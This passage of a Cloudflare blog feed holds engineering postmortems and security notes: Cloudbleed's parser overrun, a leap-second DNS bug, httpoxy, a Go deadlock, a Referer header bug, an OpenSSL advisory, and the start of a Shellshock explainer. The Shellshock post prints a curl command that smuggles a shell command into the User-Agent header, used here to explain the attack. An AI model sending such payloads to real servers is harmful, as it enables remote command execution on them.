            <p>A final empty buffer (<code>pos</code> and <code>last</code> both NULL and <code>last_buf = 1</code>) will follow that buffer but <code>ngx_http_email_parse_email</code> is not invoked if the buffer is empty.</p><p>So, in the case where only the old parser is present, the final buffer that contains data has <code>last_buf</code> set to 0. That means that <code>eof</code> will be NULL. Now when trying to handle <code>script_consume_attr</code> with an unfinished tag at the end of the buffer the <code>$lerr</code> will not be executed because the parser believes (because of <code>last_buf</code>) that there may be more data coming.</p><p>The situation is different when both parsers are present. <code>last_buf</code> is 1, <code>eof</code> is set to <code>pe</code> and the <code>$lerr</code> code runs. Here’s the generated code for it:</p>
            <pre><code>/* #line 877 "ngx_http_email_filter_parser.rl" */
{ dd("script consume_attr failed");
              {goto st1266;} }
     goto st0;

[...]

st1266:
    if ( ++p == pe )
        goto _test_eof1266;</code></pre>
            <p>The parser runs out of characters while trying to perform <code>script_consume_attr</code> and <code>p</code> will be <code>pe</code> when that happens. Because there’s no <code>fhold</code> (that would have done <code>p--</code>) when the code jumps to <code>st1266</code> <code>p</code> is incremented and is now past <code>pe</code>.</p><p>It then won’t jump to <code>_test_eof1266</code> (where EOF checking would have been performed) and will carry on past the end of the buffer trying to parse the HTML document.</p><p>So, the bug had been dormant for years until the internal feng shui of the buffers passed between NGINX filter modules changed with the introduction of cf-html.</p>
    <div>
      <h2>Going bug hunting</h2>
      <a href="#going-bug-hunting">
        
      </a>
    </div>
    <p>Research by IBM in the 1960s and 1970s showed that bugs tend to cluster in what became known as “error-prone modules”. Since we’d identified a nasty pointer overrun in the code generated by Ragel it was prudent to go hunting for other bugs.</p><p>Part of the infosec team started <a href="https://en.wikipedia.org/wiki/Fuzzing">fuzzing</a> the generated code to look for other possible pointer overruns. Another team built test cases from malformed web pages found in the wild. A software engineering team began a manual inspection of the generated code looking for problems.</p><p>At that point it was decided to add explicit pointer checks to every pointer access in the generated code to prevent any future problem and to log any errors seen in the wild. The errors generated were fed to our global error logging infrastructure for analysis and trending.</p>
            <pre><code>#define SAFE_CHAR ({\
    if (!__builtin_expect(p &lt; pe, 1)) {\
        ngx_log_error(NGX_LOG_CRIT, r-&gt;connection-&gt;log, 0, "email filter tried to access char past EOF");\
        RESET();\
        output_flat_saved(r, ctx);\
        BUF_STATE(output);\
        return NGX_ERROR;\
    }\
    *p;\
})</code></pre>
            <p>And we began seeing log lines like this:</p>
            <pre><code>2017/02/19 13:47:34 [crit] 27558#0: *2 email filter tried to access char past EOF while sending response to client, client: 127.0.0.1, server: localhost, request: "GET /malformed-test.html HTTP/1.1”</code></pre>
            <p>Every log line indicates an HTTP request that could have leaked private memory. By logging how often the problem was occurring we hoped to get an estimate of the number of times HTTP request had leaked memory while the bug was present.</p><p>In order for the memory to leak the following had to be true:</p><p>The final buffer containing data had to finish with a malformed script or img tagThe buffer had to be less than 4k in length (otherwise NGINX would crash)The customer had to either have Email Obfuscation enabled (because it uses both the old and new parsers as we transition),… or Automatic HTTPS Rewrites/Server Side Excludes (which use the new parser) in combination with another Cloudflare feature that uses the old parser.… and Server-Side Excludes only execute if the client IP has a poor reputation (i.e. it does not work for most visitors).</p><p>That explains why the buffer overrun resulting in a leak of memory occurred so infrequently.</p><p>Additionally, the Email Obfuscation feature (which uses both parsers and would have enabled the bug to happen on the most Cloudflare sites) was only enabled on February 13 (four days before Tavis’ report).</p><p>The three features implicated were rolled out as follows. The earliest date memory could have leaked is 2016-09-22.</p><p>2016-09-22 Automatic HTTP Rewrites enabled2017-01-30 Server-Side Excludes migrated to new parser2017-02-13 Email Obfuscation partially migrated to new parser2017-02-18 Google reports problem to Cloudflare and leak is stopped</p><p>The greatest potential impact occurred for four days starting on February 13 because Automatic HTTP Rewrites wasn’t widely used and Server-Side Excludes only activate for malicious IP addresses.</p>
    <div>
      <h2>Internal impact of the bug</h2>
      <a href="#internal-impact-of-the-bug">
        
      </a>
    </div>
    <p>Cloudflare runs multiple separate processes on the edge machines and these provide process and memory isolation. The memory being leaked was from a process based on NGINX that does HTTP handling. It has a separate heap from processes doing SSL, image re-compression, and caching, which meant that we were quickly able to determine that SSL private keys belonging to our customers could not have been leaked.</p><p>However, the memory space being leaked did still contain sensitive information. One obvious piece of information that had leaked was a private key used to secure connections between Cloudflare machines.</p><p>When processing HTTP requests for customers’ web sites our edge machines talk to each other within a rack, within a data center, and between data centers for logging, caching, and to retrieve web pages from origin web servers.</p><p>In response to heightened concerns about surveillance activities against Internet companies, we decided in 2013 to encrypt all connections between Cloudflare machines to prevent such an attack even if the machines were sitting in the same rack.</p><p>The private key leaked was the one used for this machine to machine encryption. There were also a small number of secrets used internally at Cloudflare for authentication present.</p>
    <div>
      <h2>External impact and cache clearing</h2>
      <a href="#external-impact-and-cache-clearing">
        
      </a>
    </div>
    <p>More concerning was that fact that chunks of in-flight HTTP requests for Cloudflare customers were present in the dumped memory. That meant that information that should have been private could be disclosed.</p><p>This included HTTP headers, chunks of POST data (perhaps containing passwords), JSON for API calls, URI parameters, cookies and other sensitive information used for authentication (such as API keys and OAuth tokens).</p><p>Because Cloudflare operates a large, shared infrastructure an HTTP request to a Cloudflare web site that was vulnerable to this problem could reveal information about an unrelated other Cloudflare site.</p><p>An additional problem was that Google (and other search engines) had cached some of the leaked memory through their normal crawling and caching processes. We wanted to ensure that this memory was scrubbed from search engine caches before the public disclosure of the problem so that third-parties would not be able to go hunting for sensitive information.</p><p>Our natural inclination was to get news of the bug out as quickly as possible, but we felt we had a duty of care to ensure that search engine caches were scrubbed before a public announcement.</p><p>The infosec team worked to identify URIs in search engine caches that had leaked memory and get them purged. With the help of Google, Yahoo, Bing and others, we found 770 unique URIs that had been cached and which contained leaked memory. Those 770 unique URIs covered 161 unique domains. The leaked memory has been purged with the help of the search engines.</p><p>We also undertook other search expeditions looking for potentially leaked information on sites like Pastebin and did not find anything.</p>
    <div>
      <h2>Some lessons</h2>
      <a href="#some-lessons">
        
      </a>
    </div>
    <p>The engineers working on the new HTML parser had been so worried about bugs affecting our service that they had spent hours verifying that it did not contain security problems.</p><p>Unfortunately, it was the ancient piece of software that contained a latent security problem and that problem only showed up as we were in the process of migrating away from it. Our internal infosec team is now undertaking a project to fuzz older software looking for potential other security problems.</p>
    <div>
      <h2>Detailed Timeline</h2>
      <a href="#detailed-timeline">
        
      </a>
    </div>
    <p>We are very grateful to our colleagues at Google for contacting us about the problem and working closely with us through its resolution. All of which occurred without any reports that outside parties had identified the issue or exploited it.</p><p>All times are UTC.</p><p>2017-02-18 0011 Tweet from Tavis Ormandy asking for Cloudflare contact information2017-02-18 0032 Cloudflare receives details of bug from Google2017-02-18 0040 Cross functional team assembles in San Francisco2017-02-18 0119 Email Obfuscation disabled worldwide2017-02-18 0122 London team joins2017-02-18 0424 Automatic HTTPS Rewrites disabled worldwide2017-02-18 0722 Patch implementing kill switch for cf-html parser deployed worldwide</p><p>2017-02-20 2159 SAFE_CHAR fix deployed globally</p><p>2017-02-21 1803 Automatic HTTPS Rewrites, Server-Side Excludes and Email Obfuscation re-enabled worldwide</p><p><i>NOTE: This post was updated to reflect updated information.</i></p> ]]></content:encoded>
            <category><![CDATA[Post Mortem]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Privacy]]></category>
            <category><![CDATA[Bugs]]></category>
            <guid isPermaLink="false">nSD8VcIsba3d7IEBQiZPP</guid>
            <dc:creator>John Graham-Cumming</dc:creator>
        </item>
        <item>
            <title><![CDATA[How and why the leap second affected Cloudflare DNS]]></title>
            <link>https://blog.cloudflare.com/how-and-why-the-leap-second-affected-cloudflare-dns/</link>
            <pubDate>Sun, 01 Jan 2017 22:40:26 GMT</pubDate>
            <description><![CDATA[ At midnight UTC on New Year’s Day, deep inside Cloudflare’s custom RRDNS software, a number went negative when it should always have been, at worst, zero. A little later this negative value caused RRDNS to panic.  ]]></description>
            <content:encoded><![CDATA[ <p>At midnight UTC on New Year’s Day, deep inside Cloudflare’s custom <a href="/tag/rrdns/">RRDNS</a> software, a number went negative when it should always have been, at worst, zero. A little later this negative value caused RRDNS to panic. This panic was caught using the recover feature of the Go language. The net effect was that some DNS resolutions to some Cloudflare managed web properties failed.</p><p>The problem only affected customers who use CNAME DNS records with Cloudflare, and only affected a small number of machines across Cloudflare's 102 data centers. At peak approximately 0.2% of DNS queries to Cloudflare were affected and less than 1% of all HTTP requests to Cloudflare encountered an error.</p><p>This problem was quickly identified. The most affected machines were patched in 90 minutes and the fix was rolled out worldwide by 0645 UTC. We are sorry that our customers were affected, but we thought it was worth writing up the root cause for others to understand.</p>
    <div>
      <h3>A little bit about Cloudflare DNS</h3>
      <a href="#a-little-bit-about-cloudflare-dns">
        
      </a>
    </div>
    <p>Cloudflare customers use our <a href="https://www.cloudflare.com/dns/">DNS service</a> to serve the authoritative answers for DNS queries for their domains. They need to tell us the IP address of their origin web servers so we can contact the servers to handle non-cached requests. They do this in two ways: either they enter the IP addresses associated with the names (e.g. the IP address of example.com is 192.0.2.123 and is entered as an A record) or they enter a CNAME (e.g. example.com is origin-server.example-hosting.biz).</p><p>This image shows a test site with an A record for <code>theburritobot.com</code> and a CNAME for <code>www.theburritobot.com</code> pointing directly to Heroku.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6849XKj9F4rFAMEnAT53RX/4a550069ff1b976af330dafffc087783/cloudflare_dns_control_panel.png.scaled500.png" />
            
            </figure><p>When a customer uses the CNAME option, Cloudflare has occasionally to do a lookup, using DNS, for the actual IP address of the origin server. It does this automatically using standard recursive DNS. It was this CNAME lookup code that contained the bug that caused the outage.</p><p>Internally, Cloudflare operates DNS resolvers to lookup DNS records from the Internet and RRDNS talks to these resolvers to get IP addresses when doing CNAME lookups. RRDNS keeps track of how well the internal resolvers are performing and does a weighted selection of possible resolvers (we operate multiple per data center for redundancy) and chooses the most performant. Some of these resolutions ended up recording in a data structure a negative value during the leap second.</p><p>The weighted selection code, at a later point, was being fed the negative number which caused it to panic. The negative number got there through a combination of the leap second and smoothing.</p>
    <div>
      <h3>A falsehood programmers believe about time</h3>
      <a href="#a-falsehood-programmers-believe-about-time">
        
      </a>
    </div>
    <p>The root cause of the bug that affected our DNS service was the belief that <i>time cannot go backwards</i>. In our case, some code assumed that the <i>difference</i> between two times would always be, at worst, zero.</p><p>RRDNS is written in Go and uses Go’s <a href="https://golang.org/pkg/time/#Now">time.Now()</a> function to get the time. Unfortunately, this function does not guarantee monotonicity. Go currently doesn’t offer a monotonic time source (see issue <a href="https://github.com/golang/go/issues/12914">12914</a> for discussion).</p><p>In measuring the performance of the upstream DNS resolvers used for CNAME lookups RRDNS contains the following code:</p>
            <pre><code>// Update upstream sRTT on UDP queries, penalize it if it fails
if !start.IsZero() {
	rtt := time.Now().Sub(start)
	if success &amp;&amp; rcode != dns.RcodeServerFailure {
		s.updateRTT(rtt)
	} else {
		// The penalty should be a multiple of actual timeout
		// as we don't know when the good message was supposed to arrive,
		// but it should not put server to backoff instantly
		s.updateRTT(TimeoutPenalty * s.timeout)
	}
}</code></pre>
            <p>In the code above <code>rtt</code> could be negative if time.Now() was earlier than <code>start</code> (which was set by a call to <code>time.Now()</code> earlier).</p><p>That code works well if time moves forward. Unfortunately, we’ve tuned our resolvers to be very fast which means that it’s normal for them to answer in a few milliseconds. If, right when a resolution is happening, time goes back a second the perceived resolution time will be <i>negative</i>.</p><p>RRDNS doesn’t just keep a single measurement for each resolver, it takes many measurements and smoothes them. So, the single measurement wouldn’t cause RRDNS to think the resolver was working in negative time, but after a few measurements the smoothed value would eventually become negative.</p><p>When RRDNS selects an upstream to resolve a CNAME it uses a weighted selection algorithm. The code takes the upstream time values and feeds them to Go’s <a href="https://golang.org/pkg/math/rand/#Int63n">rand.Int63n()</a> function. <code>rand.Int63n</code> promptly panics if its argument is negative. That's where the RRDNS panics were coming from.</p><p>(Aside: there are many other <a href="http://infiniteundo.com/post/25326999628/falsehoods-programmers-believe-about-time">falsehoods programmers believe about time</a>)</p>
    <div>
      <h3>The one character fix</h3>
      <a href="#the-one-character-fix">
        
      </a>
    </div>
    <p>One precaution when using a non-monotonic clock source is to always check whether the difference between two timestamps is negative. Should this happen, it’s not possible to accurately determine the time difference until the clock stops rewinding.</p><p>In this patch we allowed RRDNS to forget about current upstream performance, and let it normalize again if time skipped backwards. This prevents leaking of negative numbers to the server selection code, which would result in throwing errors before attempting to contact the upstream server.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2j85WZisqjCJVcyemxck8s/5fdacf08b5b00ac2f764671e133b49ed/Screen-Shot-2017-01-01-at-12.22.33.png" />
            
            </figure><p>The fix we applied prevents the recording of negative values in server selection. Restarting all the RRDNS servers then fixed any recurrence of the problem.</p>
    <div>
      <h3>Timeline</h3>
      <a href="#timeline">
        
      </a>
    </div>
    <p>The following is the complete timeline of the events around the leap second bug.</p><p>2017-01-01 00:00 UTC Impact starts2017-01-01 00:10 UTC Escalated to engineers2017-01-01 00:34 UTC Issue confirmed2017-01-01 00:55 UTC Mitigation deployed to one canary node and confirmed2017-01-01 01:03 UTC Mitigation deployed to canary data center and confirmed2017-01-01 01:23 UTC Fix deployed in most impacted data center2017-01-01 01:45 UTC Fix being deployed to major data centers2017-01-01 01:48 UTC Fix being deployed everywhere2017-01-01 02:50 UTC Fix rolled out to most of the affected data centers2017-01-01 06:45 UTC Impact ends</p><p>This chart shows error rates for each Cloudflare data center (some data centers were more affected than others) and the rapid drop in errors as the fix was deployed. We deployed the fix prioritizing those locations with the most errors first.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6jwqwG3byUaTj1jux5soqZ/d7a15c7b78547a96f1c7af8b30853f69/Screen-Shot-2017-01-01-at-13.59.43-1.png" />
            
            </figure>
    <div>
      <h3>Conclusion</h3>
      <a href="#conclusion">
        
      </a>
    </div>
    <p>We are sorry that our customers were affected by this bug and are inspecting all our code to ensure that there are no other leap second sensitive uses of time intervals.</p> ]]></content:encoded>
            <category><![CDATA[DNS]]></category>
            <category><![CDATA[Post Mortem]]></category>
            <category><![CDATA[RRDNS]]></category>
            <category><![CDATA[Bugs]]></category>
            <category><![CDATA[Reliability]]></category>
            <guid isPermaLink="false">2JqGGC2jqza5Af6kS3C3EA</guid>
            <dc:creator>John Graham-Cumming</dc:creator>
        </item>
        <item>
            <title><![CDATA[CloudFlare sites protected from httpoxy]]></title>
            <link>https://blog.cloudflare.com/cloudflare-sites-protected-from-httpoxy/</link>
            <pubDate>Mon, 18 Jul 2016 15:26:00 GMT</pubDate>
            <description><![CDATA[ We have rolled out automatic protection for all customers for the the newly announced vulnerability called httpoxy. ]]></description>
            <content:encoded><![CDATA[ <p></p><p><a href="https://creativecommons.org/licenses/by/2.0/">CC BY 2.0</a> <a href="https://www.flickr.com/photos/joeseggiola/2696992856/">image</a> by <a href="https://www.flickr.com/photos/joeseggiola/">Joe Seggiola</a></p><p>We have rolled out automatic protection for all customers for the the newly announced vulnerability called <a href="https://httpoxy.org/">httpoxy</a>.</p><p>This vulnerability affects applications that use “classic” CGI execution models, and could lead to API token disclosure of the services that your application may talk to.</p><p>By default httpoxy requests are modified to be harmless and then request is allowed through, however customers who want to outright block those requests can also use the <a href="https://www.cloudflare.com/learning/ddos/glossary/web-application-firewall-waf/">Web Application Firewall</a> rule 100050 in CloudFlare Specials to block requests that could lead to the httpoxy vulnerability.</p> ]]></content:encoded>
            <category><![CDATA[Attacks]]></category>
            <category><![CDATA[Bugs]]></category>
            <category><![CDATA[Vulnerabilities]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[API]]></category>
            <guid isPermaLink="false">7fhu3hhIvJ0ihz7IwTdtml</guid>
            <dc:creator>Ben Cartwright-Cox</dc:creator>
        </item>
        <item>
            <title><![CDATA[Creative foot-shooting with Go RWMutex]]></title>
            <link>https://blog.cloudflare.com/creative-foot-shooting-with-go-rwmutex/</link>
            <pubDate>Thu, 29 Oct 2015 21:26:36 GMT</pubDate>
            <description><![CDATA[ Hi, I'm Filippo and today I managed to surprise myself! (And not in a good way.)

I'm developing a new module ("filter" as we call them) for RRDNS, CloudFlare's Go DNS server.  ]]></description>
            <content:encoded><![CDATA[ <p>Hi, I'm Filippo and today I managed to surprise myself! (And not in a good way.)</p><p>I'm developing a new module ("filter" as we call them) for <a href="/tag/rrdns/">RRDNS</a>, CloudFlare's Go DNS server. It's a rewrite of the authoritative module, the one that adds the IP addresses to DNS answers.</p><p>It has a table of CloudFlare IPs that looks like this:</p>
            <pre><code>type IPMap struct {
	sync.RWMutex
	M map[string][]net.IP
}</code></pre>
            <p>It's a global filter attribute:</p>
            <pre><code>type V2Filter struct {
	name       string
	IPTable    *IPMap
	// [...]
}</code></pre>
            
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4YvPr9fRpSXLyFVZ4BL2lr/b11623aba2d210ffac4dcc6a11f43b32/1280px-Mexican_Standoff.jpg" />
            
            </figure><p><a href="https://www.flickr.com/photos/28293006@N05/8144747570">CC-BY-NC-ND image by Martin SoulStealer</a></p><p>The table changes often, so a background goroutine periodically reloads it from our distributed key-value store, acquires the lock (<code>f.IPTable.Lock()</code>), updates it and releases the lock (<code>f.IPTable.Unlock()</code>). This happens every 5 minutes.</p><p>Everything worked in tests, including multiple and concurrent requests.</p><p>Today we deployed to an off-production test machine and everything worked. For a few minutes. Then RRDNS stopped answering queries for the beta domains served by the new code.</p><p>What. _That worked on my laptop_™.</p><p>Here's the IPTable consumer function. You can probably spot the bug.</p>
            <pre><code>func (f *V2Filter) getCFAddr(...) (result []dns.RR) {
	f.IPTable.RLock()
	// [... append IPs from f.IPTable.M to result ...]
	return
}</code></pre>
            <p><code>f.IPTable.RUnlock()</code> is never called. Whoops. But it's an RLock, so multiple <code>getCFAddr</code> calls should work, and only table reloading should break, no? Instead <code>getCFAddr</code> started blocking after a few minutes. To the docs!</p><p><i>To ensure that the lock eventually becomes available, a blocked Lock call excludes new readers from acquiring the lock.</i> <a href="https://golang.org/pkg/sync/#RWMutex.Lock">https://golang.org/pkg/sync/#RWMutex.Lock</a></p><p>So everything worked and RLocks piled up until the table reload function ran, then the pending Lock call caused all following RLock calls to block, breaking RRDNS answer generation.</p><p>In tests the table reload function never ran while answering queries, so <code>getCFAddr</code> kept piling up RLock calls but never blocked.</p><p>No customers were affected because A) the release was still being tested on off-production machines and B) no real customers run on the new code yet. Anyway it was a interesting way to cause a deferred deadlock.</p><p>In closing, there's probably space for a better tooling here. A static analysis tool might output a listing of all Lock/Unlock calls, and a dynamic analysis tool might report still [r]locked Mutex at the end of tests. (Or maybe these tools already exist, in which case let me know!)</p><p><i>Do you want to help (introduce </i><code><i>:)</i></code><i> and) fix bugs in the DNS server answering more than 50 billion queries every day? </i><a href="https://www.cloudflare.com/join-our-team"><i>We are hiring in London, San Francisco and Singapore!</i></a></p> ]]></content:encoded>
            <category><![CDATA[RRDNS]]></category>
            <category><![CDATA[Bugs]]></category>
            <category><![CDATA[DNS]]></category>
            <category><![CDATA[Reliability]]></category>
            <category><![CDATA[Programming]]></category>
            <category><![CDATA[Go]]></category>
            <guid isPermaLink="false">5iwarGrOuKY1ZIhN7o19u9</guid>
            <dc:creator>Filippo Valsorda</dc:creator>
        </item>
        <item>
            <title><![CDATA[Weird bug of the day: Twitter in-app browser can't visit site]]></title>
            <link>https://blog.cloudflare.com/weird-bug-of-the-day-twitter-in-app-browser-cant-visit-site/</link>
            <pubDate>Tue, 08 Sep 2015 09:55:03 GMT</pubDate>
            <description><![CDATA[ We keep a close eye on tweets that mention CloudFlare because sometimes we get early warning about odd errors that we are not seeing ourselves through our monitoring systems. Towards the end of August we saw a small number of tweets like this one: ]]></description>
            <content:encoded><![CDATA[ <p>We keep a close eye on tweets that mention CloudFlare because sometimes we get early warning about odd errors that we are not seeing ourselves through our monitoring systems.</p><p>Towards the end of August we saw a small number of tweets like this one:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3N70nN3la2z027RKH74AMt/860b153c7dae72850bd5d411839c7c07/Screen-Shot-2015-09-07-at-14-18-42.png" />
            
            </figure><p>indicating that trying to browse to a CloudFlare customer web site using the Twitter in-app browser was resulting in an error page. Which was <i>very odd</i> because it was clearly only happening occasionally: <i>very</i> occasionally.</p><p>Luckily, the person who tweeted that was in the same timezone as me and able to help debug together (thanks <a href="https://twitter.com/jamesrwhite">James White</a>!); we discovered that the following sequence of events was necessary to reproduce the bug:</p><ol><li><p>Click on a link in a tweet to a web site that is using an <i>https</i> URL and open in the Twitter in-app browser (not mobile Safari). This site may or may not be a CloudFlare customer.</p></li><li><p>Then click on a link on that page to a site over an <i>http</i> URL. This site must be on CloudFlare.</p></li><li><p>BOOM</p></li></ol><p>That explained why this happened very rarely, but the question became... why did it happen at all? After some debugging it appeared to happen in recent versions of both iOS and the Twitter app (including the iOS 9 beta).</p><p>To figure out what was going on I turned to <a href="http://www.charlesproxy.com/">Charles Proxy</a> and used it to intercept the communication between my iPhone and CloudFlare. Happily, Charles Proxy can <a href="http://www.charlesproxy.com/documentation/faqs/ssl-connections-from-within-iphone-applications/">intercept SSL connections</a> by installing a custom certificate on a phone. I ran Charles Proxy on my laptop, pointed my iPhone it at (to use it as a proxy) and clicked on a tweet to a site that I had set up specially for testing.</p><p>Charles Proxy showed that the request that generated an error looked like this:</p>
            <pre><code>GET /test HTTP/1.1\r\n
Host: www.example.com\r\n
Referer: \r\n
Accept-Encoding: gzip, deflate\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n
Accept-Language: en-us\r\n
Connection: keep-alive\r\n
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H321 Twitter for iPhone\r\n
\r\n</code></pre>
            <p>At first glance this looked pretty normal but on a second look something really stuck out:</p>
            <pre><code>Referer: \r\n</code></pre>
            <p><a href="https://tools.ietf.org/html/rfc7231#section-5.5.2">RFC7231</a> clearly states that if the Referer header is present it must contain a URI:</p>
            <pre><code>Referer = absolute-URI / partial-URI</code></pre>
            <p>The RFC also gives a clue is to why the header is in this state when jumping from HTTPS to HTTP:</p><blockquote><p>A user agent MUST NOT send a Referer header field in anunsecured HTTP request if the referring page was received with asecure protocol.</p></blockquote>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6mtfnt5DXeYMJ6SXR7GOgg/33a121a054a1e600f9c9a7ba81a81020/Screen-Shot-2015-09-07-at-14-48-07.png" />
            
            </figure><p>CloudFlare's <a href="https://support.cloudflare.com/hc/en-us/articles/200170086-What-does-the-Browser-Integrity-Check-do-">Browser Integrity Check</a> was verifying that the Referer header was well formed and generating the error (since there's a Referer, but it's empty) and it looks like the Twitter app in-app browser (and, we later discovered, the Facebook app in-app browser) are, instead of removing the header, blanking it out.</p><p>This is a good example of how it's not always easy to be "strictly" RFC-compliant. <a href="https://en.wikipedia.org/wiki/Robustness_principle">Postel's Law</a> tells us that in this case CloudFlare needs to relax its check.</p><p>We reported this problem to both Twitter and Facebook and rolled out a fix that allows this behavior on the part of these clients and will turn the strict checking back on when it makes sense.</p><p>But watch your software if you validate the Referer header. You might be running into this oddness.</p> ]]></content:encoded>
            <category><![CDATA[Bugs]]></category>
            <guid isPermaLink="false">6ZyN6gEats7CYNZ81XSCuL</guid>
            <dc:creator>John Graham-Cumming</dc:creator>
        </item>
        <item>
            <title><![CDATA[OpenSSL Security Advisory of 19 March 2015]]></title>
            <link>https://blog.cloudflare.com/openssl-security-advisory-of-19-march-2015/</link>
            <pubDate>Thu, 19 Mar 2015 15:15:54 GMT</pubDate>
            <description><![CDATA[ Today there were multiple vulnerabilities released in OpenSSL, a cryptographic library used by CloudFlare (and most sites on the Internet). ]]></description>
            <content:encoded><![CDATA[ <p>Today there were <a href="http://openssl.org/news/secadv_20150319.txt">multiple vulnerabilities</a> released in <a href="https://www.openssl.org/">OpenSSL</a>, a cryptographic library used by CloudFlare (and most sites on the Internet). There has been advance notice that an announcement would be forthcoming, although the contents of the vulnerabilities were kept closely controlled and shared only with major operating system vendors until this notice.</p><p>Based on our analysis of the vulnerabilities and how CloudFlare uses the OpenSSL library, this batch of vulnerabilties primarily affects CloudFlare as a "Denial of Service" possibility (it can cause CloudFlare's proxy servers to crash), rather than as an information disclosure vulnerability. Customer traffic and customer SSL keys continue to be protected.</p><p>As is good security practice, we have quickly tested the patched version and begun a push to our production environment, to be completed within the hour. We encourage all customers to upgrade to the latest patched versions of OpenSSL on their own servers, particularly if they are using the 1.0.2 branch of the OpenSSL library.</p><p>The individual vulnerabilities included in this announcement are:</p><ul><li><p>OpenSSL 1.0.2 ClientHello sigalgs DoS (CVE-2015-0291)</p></li><li><p>Reclassified: RSA silently downgrades to EXPORT_RSA [Client] (CVE-2015-0204)</p></li><li><p>Multiblock corrupted pointer (CVE-2015-0290)</p></li><li><p>Segmentation fault in DTLSv1_listen (CVE-2015-0207)</p></li><li><p>Segmentation fault in ASN1_TYPE_cmp (CVE-2015-0286)</p></li><li><p>Segmentation fault for invalid PSS parameters (CVE-2015-0208)</p></li><li><p>ASN.1 structure reuse memory corruption (CVE-2015-0287)</p></li><li><p>PKCS7 NULL pointer dereferences (CVE-2015-0289)</p></li><li><p>Base64 decode (CVE-2015-0292)</p></li><li><p>DoS via reachable assert in SSLv2 servers (CVE-2015-0293)</p></li><li><p>Empty CKE with client auth and DHE (CVE-2015-1787)</p></li><li><p>Handshake with unseeded PRNG (CVE-2015-0285)</p></li><li><p>Use After Free following d2i_ECPrivatekey error (CVE-2015-0209)</p></li><li><p>X509_to_X509_REQ NULL pointer deref (CVE-2015-0288)</p></li></ul><p>We thank the OpenSSL project and the individual vulnerability reporters for finding, disclosing, and remediating these problems. All software has bugs, sometimes security critical bugs, and having a good process for handling them once identified is a necessary part of the world of computer software.</p> ]]></content:encoded>
            <category><![CDATA[Bugs]]></category>
            <category><![CDATA[OpenSSL]]></category>
            <category><![CDATA[Vulnerabilities]]></category>
            <category><![CDATA[SSL]]></category>
            <guid isPermaLink="false">5iDk819SWpIq72Z4POaLdw</guid>
            <dc:creator>Ryan Lackey</dc:creator>
        </item>
        <item>
            <title><![CDATA[Inside Shellshock: How hackers are using it to exploit systems]]></title>
            <link>https://blog.cloudflare.com/inside-shellshock/</link>
            <pubDate>Tue, 30 Sep 2014 22:38:02 GMT</pubDate>
            <description><![CDATA[ On Wednesday of last week, details of the Shellshock bash bug emerged. This bug started a scramble to patch computers, servers, routers, firewalls, and other computing appliances using vulnerable versions of bash. ]]></description>
            <content:encoded><![CDATA[ <p>On Wednesday of last week, details of the <a href="http://en.wikipedia.org/wiki/Shellshock_(software_bug)">Shellshock</a> bash bug emerged. This bug started a scramble to patch computers, servers, routers, firewalls, and other computing appliances using vulnerable versions of bash.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6L3sgALNPL4lzR339hqcdb/568d1050760c355a07b8bee8ed491c4f/illustration-bash-blog-1.png" />
            
            </figure><p>CloudFlare immediately rolled out <a href="/bash-vulnerability-cve-2014-6271-patched/">protection for Pro, Business, and Enterprise customers</a> through our Web Application Firewall. On Sunday, after studying the extent of the problem, and looking at logs of attacks stopped by our WAF, we decided to roll out <a href="/shellshock-protection-enabled-for-all-customers/">protection for our Free plan customers</a> as well.</p><p>Since then we've been monitoring attacks we've stopped in order to understand what they look like, and where they come from. Based on our observations, it's clear that hackers are exploiting Shellshock worldwide.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6GuExiKPJg7xHj26otgdYi/818d955c560bd8831d5edd7a07fdd51d/287665619_2418591122_z.jpg" />
            
            </figure><p>(CC BY 2.0 <a href="https://www.flickr.com/photos/aussiegall/">aussiegall</a>)</p>
    <div>
      <h2>Eject</h2>
      <a href="#eject">
        
      </a>
    </div>
    <p>The Shellshock problem is an example of an <a href="http://en.wikipedia.org/wiki/Arbitrary_code_execution">arbitrary code execution (ACE)</a> vulnerability. Typically, ACE vulnerability attacks are executed on programs that are running, and require a highly sophisticated understanding of the internals of code execution, memory layout, and assembly language—in short, this type of attack requires an expert.</p><p>Attacker will also use an ACE vulnerability to upload or run a program that gives them a simple way of controlling the targeted machine. This is often achieved by running a "shell". A shell is a command-line where commands can be entered and executed.</p><p>The Shellshock vulnerability is a major problem because it removes the need for specialized knowledge, and provides a simple (unfortunately, very simple) way of taking control of another computer (such as a web server) and making it run code.</p><p>Suppose for a moment that you wanted to attack a web server and make its CD or DVD drive slide open. There's actually a command on Linux that will do that: <code>/bin/eject</code>. If a web server is vulnerable to Shellshock you could attack it by adding the magic string <code>() { :; };</code> to <code>/bin/eject</code> and then sending that string to the target computer over HTTP. Normally, the <code>User-Agent</code> string would identify the type of browser you are using, but, in in the case of the Shellshock vulnerability, it can be set to say anything.</p><p>For example, if example.com was vulnerable then</p>
            <pre><code>curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/</code></pre>
            <p>would be enough to actually make the CD or DVD drive eject.</p><p>In monitoring the Shellshock attacks we've blocked, we've actually seen someone attempting precisely that attack. So, if you run a web server and suddenly find an ejected DVD it might be an indication that your machine is vulnerable to Shellshock.</p>
    <div>
      <h2>Why that simple attack works</h2>
      <a href="#why-that-simple-attack-works">
        
      </a>
    </div>
    <p>When a web server receives a request for a page there are three parts of the request that can be susceptible to the Shellshock attack: the request URL, the headers that are sent along with the URL, and what are known as "arguments" (when you enter your name and address on a web site it will typically be sent as arguments in the request).</p><p>For example, here's an actual HTTP request that retrieves the CloudFlare homepage:</p>
            <pre><code>GET / HTTP/1.1
Accept-Encoding: gzip,deflate,sdch
